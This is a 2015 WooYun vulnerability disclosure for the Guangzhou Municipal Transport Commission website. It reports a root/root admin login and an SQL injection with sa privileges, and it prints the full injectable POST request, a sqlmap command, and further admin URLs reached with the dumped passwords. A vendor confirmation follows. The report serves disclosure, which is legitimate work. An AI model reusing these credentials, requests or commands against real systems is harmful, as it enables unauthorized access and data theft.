当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131570

漏洞标题:广州市交通委员会存在SQL注入以及后台管理弱口令(大量密码信息泄露)

相关厂商:广州市交通委员会

漏洞作者: ㄚ冷的微笑

提交时间:2015-08-05 15:45

修复时间:2015-09-20 11:06

公开时间:2015-09-20 11:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:已交由第三方合作机构(广东省信息安全测评中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-05: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

1. 广州市交通委员会存在SQL注入,sa權限,資料庫可以打包下載,包含多個後臺管理密碼
2. 后台管理弱口令

详细说明:

http://www.gzjt.gov.cn

back1.jpg


利用弱点密码进入管理后台,发现后台有sql injection后,打包数据库并且发现其它多处后台的账号密码。

漏洞证明:

1. 发现春运后台管理弱密码,root/root可登入。
http://www.gzjt.gov.cn/ChunYun/System/Login.aspx

back2.jpg


back3.jpg


2. 发现后台有sql injection

sql1.jpg


post参数TextBox1有sql injection漏洞,权限是sa,数据库可以全打包下载,包含其他管理接口的密码。
http://www.gzjt.gov.cn:80/ChunYun/System/Module/News/News_List.aspx?Type_ID=2
(POST)
__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUIMzEyNzk2NjQPFgQeBlR5cGVJRAUBMh4KQWxsX1R5cGVJRAUBMhYCAgMPZBYGAgEPEA8WBh4NRGF0YVRleHRGaWVsZAUIUm9sZU5hbWUeDkRhdGFWYWx1ZUZpZWxkBQZSb2xlSUQeC18hRGF0YUJvdW5kZ2QQFREPLS0t6K%2B36YCJ5oupLS0tD%2Be9keermeeuoeeQhumDqA/pk4Hot6/lt6XkvZznu4QP5rCR6Iiq5bel5L2c57uED%2BWFrOi3r%2BW3peS9nOe7hA/msLTot6/lt6XkvZznu4QY5bm/5bee54Gr6L2m56uZ5bel5L2c57uEFeW5v%2BW3nuWNl%2BermeW3peS9nOe7hBjlub/lt57nkLblt57nq5nlt6XkvZznu4QJ5pil6L%2BQ5YqeD%2BaYpei/kOWKnumihuWvvBXopoHpl7vkv6Hmga/miqXpgIHlkZgV6ZOB6Lev5L%2Bh5oGv5oql6YCB5ZGYFeawkeiIquS/oeaBr%2BaKpemAgeWRmBXlhazot6/kv6Hmga/miqXpgIHlkZgV5rC06Lev5L%2Bh5oGv5oql6YCB5ZGYFeWFtuWug%2BS/oeaBr%2BaKpemAgeWRmBURATABMQE3AjEwAjExAjEyAjE1AjE2AjE3AjE4AjE5AjIwAjI0AjI1AjI2AjI3AjI4FCsDEWdnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCBg8PZBYCHgdvbmNsaWNrBShyZXR1cm4gY29uZmlybSgn56Gu5a6a6KaB5Yig6Zmk5ZCX77yfJyk7ZAILDzwrABEDAA8WBB8EZx4LXyFJdGVtQ291bnQCDGQBEBYAFgAWAAkWCB4NRmlyc3RQYWdlVGV4dAUG6aaW6aG1HhBQcmV2aW91c1BhZ2VUZXh0BQnkuIrkuIDpobUeDE5leHRQYWdlVGV4dAUJ5LiL5LiA6aG1HgxMYXN0UGFnZVRleHQFBuacq%2BmhtRYCZg9kFhRmD2QWAmYPZBYCZg8QD2QWAh8FBRZ5eV9DbGlja0NoZWNrQWxsKHRoaXMpZGRkAgEPZBYWAgEPDxYCHgRUZXh0BQQxOTIwZGQCAg9kFgICAQ8PFgYfCwU85pyx5bCP5Li555yB6ZW/5qOA5p%2Bl5oyH5a%2B85bm/5bee54Gr6L2m56uZ5Zyw5Yy65pil6L%2BQ5bel5L2cHgdUb29sVGlwZR4LTmF2aWdhdGVVcmwFIU5ld3NfQWRkLmFzcHg/SUQ9MTkyMCZwYWdlSW5kZXg9MGRkAgMPDxYCHwsFDOimgemXu%2BS/oeaBr2RkAgQPDxYCHwsFATFkZAIFDw8WAh8LBRIyMDE1LTItMTcgMjI6Mjg6MTRkZAIGD2QWAgIBDw8WBB4PQ29tbWFuZEFyZ3VtZW50BQRUcnVlHwsFIzxmb250IGNvbG9yPXJlZD7lj5bmtojlrqHmoLg8L2ZvbnQ%2BZGQCBw9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5YWs5byAPC9mb250PmRkAggPZBYCAgEPDxYEHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BmihuWvvGRkAgkPZBYCAgEPDxYGHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BimgemXux4HRW5hYmxlZGhkZAIKD2QWAgIBDw8WBB8NBRpDb21tZW50c19saXN0LmFzcHg/SUQ9MTkyMB8PaGRkAgsPZBYCAgEPDxYCHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTkyMCZwYWdlSW5kZXg9MGRkAgIPZBYWAgEPDxYCHwsFBDE5MTlkZAICD2QWAgIBDw8WBh8LBTzmnLHlsI/kuLnnnIHplb/mo4Dmn6XmjIflr7zlub/lt57ngavovabnq5nlnLDljLrmmKXov5Dlt6XkvZwfDGUfDQUhTmV3c19BZGQuYXNweD9JRD0xOTE5JnBhZ2VJbmRleD0wZGQCAw8PFgIfCwUM6KaB6Ze75L%2Bh5oGvZGQCBA8PFgIfCwUBMWRkAgUPDxYCHwsFEjIwMTUtMi0xNyAyMTo0ODowN2RkAgYPZBYCAgEPDxYEHw4FBUZhbHNlHwsFBuWuoeaguGRkAgcPZBYCAgEPDxYEHw4FBUZhbHNlHwsFBuWFrOW8gGRkAggPZBYCAgEPDxYEHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BmihuWvvGRkAgkPZBYCAgEPDxYGHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BimgemXux8PaGRkAgoPZBYCAgEPDxYEHw0FGkNvbW1lbnRzX2xpc3QuYXNweD9JRD0xOTE5Hw9oZGQCCw9kFgICAQ8PFgIfDQUhTmV3c19BZGQuYXNweD9JRD0xOTE5JnBhZ2VJbmRleD0wZGQCAw9kFhYCAQ8PFgIfCwUEMTkwOGRkAgIPZBYCAgEPDxYGHwsFP%2BS7u%2BWtpumUi%2BmZiOW7uuWNjuajgOafpeaMh%2BWvvOW5v%2BW3nuWcsOWMuuaYpei/kOW3peS9nOaXtuimgS4uLh8MBXHku7vlrabplIvpmYjlu7rljY7mo4Dmn6XmjIflr7zlub/lt57lnLDljLrmmKXov5Dlt6XkvZzml7bopoHmsYIg56eR5a2m566h55CG57K%2B57uG5pyN5YqhIOehruS/neaYpei/kOW5s%2BWuieacieW6jx8NBSFOZXdzX0FkZC5hc3B4P0lEPTE5MDgmcGFnZUluZGV4PTBkZAIDDw8WAh8LBQzopoHpl7vkv6Hmga9kZAIEDw8WAh8LBQExZGQCBQ8PFgIfCwUSMjAxNS0yLTE0IDExOjE0OjEwZGQCBg9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5a6h5qC4PC9mb250PmRkAgcPZBYCAgEPDxYEHw4FBFRydWUfCwUjPGZvbnQgY29sb3I9cmVkPuWPlua2iOWFrOW8gDwvZm9udD5kZAIID2QWAgIBDw8WBB8OBQVGYWxzZR8LBQ/mjqjojZDoh7Ppooblr7xkZAIJD2QWAgIBDw8WBh8OBQVGYWxzZR8LBQ/mjqjojZDoh7PopoHpl7sfD2hkZAIKD2QWAgIBDw8WBB8NBRpDb21tZW50c19saXN0LmFzcHg/SUQ9MTkwOB8PaGRkAgsPZBYCAgEPDxYCHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTkwOCZwYWdlSW5kZXg9MGRkAgQPZBYWAgEPDxYCHwsFBDE5MDdkZAICD2QWAgIBDw8WBh8LBQN0ZXQfDGUfDQUhTmV3c19BZGQuYXNweD9JRD0xOTA3JnBhZ2VJbmRleD0wZGQCAw8PFgIfCwUM6KaB6Ze75L%2Bh5oGvZGQCBA8PFgIfCwUBMWRkAgUPDxYCHwsFEjIwMTUtMi0xMyAxNjo1OTowMmRkAgYPZBYCAgEPDxYEHw4FBUZhbHNlHwsFBuWuoeaguGRkAgcPZBYCAgEPDxYEHw4FBUZhbHNlHwsFBuWFrOW8gGRkAggPZBYCAgEPDxYEHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BmihuWvvGRkAgkPZBYCAgEPDxYGHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BimgemXux8PaGRkAgoPZBYCAgEPDxYEHw0FGkNvbW1lbnRzX2xpc3QuYXNweD9JRD0xOTA3Hw9oZGQCCw9kFgICAQ8PFgIfDQUhTmV3c19BZGQuYXNweD9JRD0xOTA3JnBhZ2VJbmRleD0wZGQCBQ9kFhYCAQ8PFgIfCwUEMTg1N2RkAgIPZBYCAgEPDxYGHwsFP%2BS6pOmAmui/kOi%2Bk%2BmDqOWFmue7hOaIkOWRmOWImOWwj%2BaYjuajgOafpeW5v%2BW3nuWcsOWMuuaYpei/kC4uLh8MBUjkuqTpgJrov5DovpPpg6jlhZrnu4TmiJDlkZjliJjlsI/mmI7mo4Dmn6Xlub/lt57lnLDljLrmmKXov5Dlh4blpIflt6XkvZwfDQUhTmV3c19BZGQuYXNweD9JRD0xODU3JnBhZ2VJbmRleD0wZGQCAw8PFgIfCwUM6KaB6Ze75L%2Bh5oGvZGQCBA8PFgIfCwUBMWRkAgUPDxYCHwsFETIwMTUtMi0zIDE0OjMzOjEwZGQCBg9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5a6h5qC4PC9mb250PmRkAgcPZBYCAgEPDxYEHw4FBFRydWUfCwUjPGZvbnQgY29sb3I9cmVkPuWPlua2iOWFrOW8gDwvZm9udD5kZAIID2QWAgIBDw8WBB8OBQVGYWxzZR8LBQ/mjqjojZDoh7Ppooblr7xkZAIJD2QWAgIBDw8WBh8OBQVGYWxzZR8LBQ/mjqjojZDoh7PopoHpl7sfD2hkZAIKD2QWAgIBDw8WBB8NBRpDb21tZW50c19saXN0LmFzcHg/SUQ9MTg1Nx8PaGRkAgsPZBYCAgEPDxYCHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTg1NyZwYWdlSW5kZXg9MGRkAgYPZBYWAgEPDxYCHwsFBDE4NTFkZAICD2QWAgIBDw8WBh8LBT/liJjlv5fluprlia/nnIHplb/mo4Dmn6Xlub/lt57lnLDljLrmmKXov5Dml4XlrqLov5DovpPlh4blpIcuLi4fDAVC5YiY5b%2BX5bqa5Ymv55yB6ZW/5qOA5p%2Bl5bm/5bee5Zyw5Yy65pil6L%2BQ5peF5a6i6L%2BQ6L6T5YeG5aSH5bel5L2cHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTg1MSZwYWdlSW5kZXg9MGRkAgMPDxYCHwsFDOimgemXu%2BS/oeaBr2RkAgQPDxYCHwsFATFkZAIFDw8WAh8LBRIyMDE1LTEtMjggMTA6MzU6MTdkZAIGD2QWAgIBDw8WBB8OBQRUcnVlHwsFIzxmb250IGNvbG9yPXJlZD7lj5bmtojlrqHmoLg8L2ZvbnQ%2BZGQCBw9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5YWs5byAPC9mb250PmRkAggPZBYCAgEPDxYEHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BmihuWvvGRkAgkPZBYCAgEPDxYGHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BimgemXux8PaGRkAgoPZBYCAgEPDxYEHw0FGkNvbW1lbnRzX2xpc3QuYXNweD9JRD0xODUxHw9oZGQCCw9kFgICAQ8PFgIfDQUhTmV3c19BZGQuYXNweD9JRD0xODUxJnBhZ2VJbmRleD0wZGQCBw9kFhYCAQ8PFgIfCwUEMTg1MGRkAgIPZBYCAgEPDxYGHwsFN%2BWbveWutuWSjOecgeWPrOW8gOeUteinhueUteivneS8muiurumDqOe9sjIwMTXlubTmmKUuLi4fDAU95Zu95a625ZKM55yB5Y%2Bs5byA55S16KeG55S16K%2Bd5Lya6K6u6YOo572yMjAxNeW5tOaYpei/kOW3peS9nB8NBSFOZXdzX0FkZC5hc3B4P0lEPTE4NTAmcGFnZUluZGV4PTBkZAIDDw8WAh8LBQzopoHpl7vkv6Hmga9kZAIEDw8WAh8LBQExZGQCBQ8PFgIfCwUSMjAxNS0xLTI2IDExOjIxOjEyZGQCBg9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5a6h5qC4PC9mb250PmRkAgcPZBYCAgEPDxYEHw4FBFRydWUfCwUjPGZvbnQgY29sb3I9cmVkPuWPlua2iOWFrOW8gDwvZm9udD5kZAIID2QWAgIBDw8WBB8OBQVGYWxzZR8LBQ/mjqjojZDoh7Ppooblr7xkZAIJD2QWAgIBDw8WBh8OBQVGYWxzZR8LBQ/mjqjojZDoh7PopoHpl7sfD2hkZAIKD2QWAgIBDw8WBB8NBRpDb21tZW50c19saXN0LmFzcHg/SUQ9MTg1MB8PaGRkAgsPZBYCAgEPDxYCHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTg1MCZwYWdlSW5kZXg9MGRkAggPZBYWAgEPDxYCHwsFBDE4NDlkZAICD2QWAgIBDw8WBh8LBS7lub/lt57luILnu4Tnu4flvIDlsZUyMDE15bm05pil6L%2BQ5bqU5oCl5ryU57uDHwxlHw0FIU5ld3NfQWRkLmFzcHg/SUQ9MTg0OSZwYWdlSW5kZXg9MGRkAgMPDxYCHwsFDOimgemXu%2BS/oeaBr2RkAgQPDxYCHwsFATFkZAIFDw8WAh8LBRIyMDE1LTEtMTYgMTA6MDQ6NTdkZAIGD2QWAgIBDw8WBB8OBQRUcnVlHwsFIzxmb250IGNvbG9yPXJlZD7lj5bmtojlrqHmoLg8L2ZvbnQ%2BZGQCBw9kFgICAQ8PFgQfDgUEVHJ1ZR8LBSM8Zm9udCBjb2xvcj1yZWQ%2B5Y%2BW5raI5YWs5byAPC9mb250PmRkAggPZBYCAgEPDxYEHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BmihuWvvGRkAgkPZBYCAgEPDxYGHw4FBUZhbHNlHwsFD%2BaOqOiNkOiHs%2BimgemXux8PaGRkAgoPZBYCAgEPDxYEHw0FGkNvbW1lbnRzX2xpc3QuYXNweD9JRD0xODQ5Hw9oZGQCCw9kFgICAQ8PFgIfDQUhTmV3c19BZGQuYXNweD9JRD0xODQ5JnBhZ2VJbmRleD0wZGQCCQ8PFgIeB1Zpc2libGVoZGQYAgUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgkFG0V6R3JpZFZpZXcxJGN0bDAxJGNoa0JveEFsbAUcRXpHcmlkVmlldzEkY3RsMDIkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDMkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDQkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDUkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDYkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDckY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDgkY2hrQm94SXRlbQUcRXpHcmlkVmlldzEkY3RsMDkkY2hrQm94SXRlbQULRXpHcmlkVmlldzEPPCsADAEIAgJk1ln79whI2Zal1ccYK0WmdH4YMsUwE9v8TgnOnwhgzh4%3D&__VIEWSTATEGENERATOR=412F904B&__EVENTVALIDATION=/wEWQALD1ur2CgLs0bLrBgKDkO3aAgKckO3aAgKakO3aAgKckK3ZAgKckKHZAgKckKXZAgKckJHZAgKckJXZAgKckInZAgKckM3aAgKckMHaAgKdkK3ZAgKdkJ3ZAgKdkJHZAgKdkJXZAgKdkInZAgKdkM3aAgKumv%2B2BwKumuefBAKln/PuCgKgt7D9CgLLx9PKBQKM54rGBgK7q7GGCALWlM%2BbAgKF2fXbAwKfhbWoCwLpyITLBQKSzcGWAgKTzcGWAgKUzcGWAgKqv4TLBQLxxL%2BWAgL0xL%2BWAgLzxL%2BWAgLnt4TLBQLQm72WAgLNm72WAgLOm72WAgKo8ITLBQKvlcyWAgKulcyWAgKtlcyWAgLd6oTLBQKG6smWAgKH6smWAgKI6smWAgKe4YTLBQLl4ceWAgLo4ceWAgLn4ceWAgLb2YTLBQLkt8WWAgLht8WWAgLit8WWAgKckoXLBQLDstSWAgLCstSWAgLBstSWAgLKzvGdDALlt4%2BzBgKU/LXzBwvwd8Ll8Q7gZJdKsAzyBYPuPT3bjVJtR/GAFzBir/lM&TextBox1=tet&dropType=0&TxtWritdate=&TxtWritdate2=&btnSearch=%E6%9F%A5%E8%AF%A2


sqlmap.py -r www.gzjt.gov.cn_ChunYun.txt -p TextBox1 -v 3  --dbms=mssql


sql2.jpg


sql3.jpg


sql4.jpg


sql5.jpg


sql7g.jpg


3. 发现多个其他管理后台网址,使用从sql injection取得的密码可以登入:
http://www.gzjt.gov.cn/gzjt/Admin/Login.aspx
http://www.gzjt.gov.cn/gzjtsdljweb/Admin/Login.aspx
http://www.gzjt.gov.cn/gcxxweb/Admin/Login.aspx

sql6.jpg

修复方案:

大牛比我懂

版权声明:转载请注明来源 ㄚ冷的微笑@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-06 11:05

厂商回复:

非常感谢您的报告。
报告中的问题已确认并复现.
影响的数据:高
攻击成本:低
造成影响:高
综合评级为:高,rank:12
正在联系相关网站管理单位处置。

最新状态:

暂无